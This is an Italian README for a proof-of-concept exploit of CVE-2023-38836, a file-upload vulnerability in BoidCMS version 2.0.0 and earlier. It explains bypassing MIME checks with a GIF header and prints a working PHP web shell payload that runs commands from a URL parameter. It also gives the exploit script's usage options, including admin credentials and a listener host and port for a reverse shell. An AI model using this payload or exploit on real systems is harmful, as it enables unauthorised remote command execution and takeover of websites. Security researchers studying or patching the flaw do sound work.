
PoC exploit per la vulnerabilità di upload di file in BoidCMS versione <=2.0.0
Vulnerabilità di File Upload in BoidCMS v.2.0.0 consente a un attaccante autenticato di caricare un file con tipo pericoloso (CWE-434).
Per sfruttarla, un attaccante potrebbe aggiungere un'intestazione GIF per bypassare i controlli del tipo MIME.
GIF89a;
<?php system($_GET["cmd"]); ?>
usage: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]
Exploit per CVE-2023-38836
opzioni:
-h, --help mostra questo messaggio di aiuto ed esci
-u URL, --url URL url del sito web
-U USER, --user USER nome utente admin
-P PASSWD, --passwd PASSWD
password admin
-l LHOST, --lhost LHOST
host in ascolto
-p LPORT, --lport LPORT
porta in ascolto
